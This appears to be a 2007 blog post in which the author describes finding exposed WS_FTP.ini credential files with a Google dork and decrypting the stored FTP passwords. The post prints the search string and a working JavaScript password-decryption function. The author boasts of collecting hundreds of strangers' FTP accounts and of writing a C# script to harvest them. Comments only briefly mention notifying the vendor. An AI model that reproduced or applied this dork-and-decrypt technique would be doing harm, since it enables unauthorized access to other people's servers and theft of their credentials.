WS_FTP Tweaking

Quite recently i was wondering to install an ftp server on my box.(Windows one) i got it downloaded from the website and was using it without any problem.Then all of the sudden i acciedently opened up the folder of WS_FTP and got a look on WS_FTP.ini file -_-.It’s where all the usernames and passwords of the ftp sites you connect are stored wow.!

This made me curious what if some one have shared his WS_FTP.ini File! Could be ! Fire up the browser and asked google if is there any fool around! 😉 With dork inurl:WS_FTP filetype:ini guess what i got 100’s of results wow!!

Downloaded there WS_FTP.ini and now what i had all the accounts with FTP usernames hosts.! i gotta decrypt the PASSWORD the next platform was Securityfocus.com! Did a search on it and found that WS_FTP have a loosy way of storing password which lead me to a java script

!--

// ************ CODE WSFTP ***************************

  function cogecifrado(str) {

  if (str.indexOf('PWD=', 0) == -1 ||

      str.length-37<0)

        alert("You should Include :'PWD='");  else {

 passw=str.substring(37,str.length);

 for (var i = 0; i<passw.length/2; i++)

  {

    var caracter=passw.substring(i*2,i*2+2);

    var sal=str.substring(5+i,6+i);

    var claro=parseInt("0x"+caracter) -i -1 - ((47+parseInt("0x"+sal))%57);

           document.form1.text2.value=document.form1.text2.value+String.fromCharCode(claro);

   }

 }

  }

// -->

// ********* WS FTP Password Decrypter ***********

Make a form and do a call to cogecifrado(str) would decrypt the password and place the value in text2 of form1 Great! We have 100’s of fools sharing there WS_FTP . I wrote a small script in C# For my personal use to get
some ftp accounts via this technique !! Peace 😀 Happy Google hacking ! and a new year! Regards Azeem

Advertisements

~ by Azeem on December 31, 2007.

4 Responses to “WS_FTP Tweaking”

  1. Man this is interesting.. u got me scared! hehe 🙂

  2. We be peace Lover Kamran 😉 \m/

  3. Not that no-one has figured it out before. I would suggest you drop an email off to guys developing WS_FTP.

  4. I already did.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

 
%d bloggers like this: